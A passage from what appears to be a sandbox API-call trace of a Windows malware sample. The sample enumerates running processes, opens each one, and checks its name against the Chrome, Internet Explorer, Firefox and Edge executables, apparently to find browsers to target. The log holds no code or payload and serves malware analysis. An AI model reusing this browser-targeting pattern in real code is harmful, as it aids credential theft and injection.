	[0212.118] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.119] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x3c70
	[0212.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.119] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.120] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.120] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.120] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.120] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.121] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x3c74
	[0212.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.121] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.123] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.123] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.123] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.124] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0212.124] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x3c78
	[0212.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.124] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0212.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.125] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.125] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0212.125] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.125] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.126] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.127] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x3c7c
	[0212.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.127] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.127] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.128] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.128] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.128] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.128] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0212.129] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x3c80
	[0212.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.130] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.130] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.130] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.130] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.131] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0212.131] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x3c84
	[0212.131] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.131] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0212.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.132] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.132] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0212.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.132] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.133] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0212.133] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x3c88
	[0212.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.133] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0212.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.134] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.134] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0212.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.134] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.135] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0212.135] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x3c8c
	[0212.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.135] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0212.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.136] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.136] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0212.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.136] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.137] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0212.137] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x3c90
	[0212.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.138] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0212.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.138] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.138] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0212.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.139] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.139] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0212.140] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x3c94
	[0212.140] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.140] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0212.140] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.140] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.140] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.140] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0212.140] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.140] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.141] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0212.141] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x3c98
	[0212.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.141] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0212.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.142] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.142] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0212.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.142] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.143] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0212.143] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0212.143] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0212.144] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x3c9c
	[0212.144] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.144] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0212.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.145] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.146] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0212.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.146] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.147] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0212.147] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x3ca0
	[0212.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.147] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0212.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.148] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.148] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0212.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.148] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.148] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0212.149] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x3ca4
	[0212.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.149] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0212.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.150] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.150] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0212.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.150] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.150] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0212.151] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x3ca8
	[0212.151] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.151] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0212.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.152] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.152] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0212.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.152] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.152] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0212.153] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x3cac
	[0212.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.153] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0212.154] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.154] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.154] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.154] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0212.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.155] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.155] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0212.156] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x3cb0
	[0212.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.156] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0212.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.156] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.157] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0212.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.157] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.157] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0212.158] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x3cb4
	[0212.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.158] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0212.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.158] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.159] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0212.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.159] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.159] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0212.160] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x3cb8
	[0212.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.160] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0212.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.161] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.162] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0212.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.162] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.162] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0212.163] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x3cbc
	[0212.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.163] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0212.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.163] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.164] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0212.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.164] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.164] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0212.165] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x3cc0
	[0212.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.165] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0212.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.165] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.165] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0212.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.166] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.166] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0212.166] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x3cc4
	[0212.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.167] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0212.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.167] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.168] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0212.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.168] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.168] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0212.169] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x3cc8
	[0212.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.169] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0212.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.170] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.170] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0212.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.171] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.171] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0212.172] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x3ccc
	[0212.172] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.172] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0212.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.173] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0212.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.173] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0212.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0212.174] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0212.174] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0212.175] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x3cd0
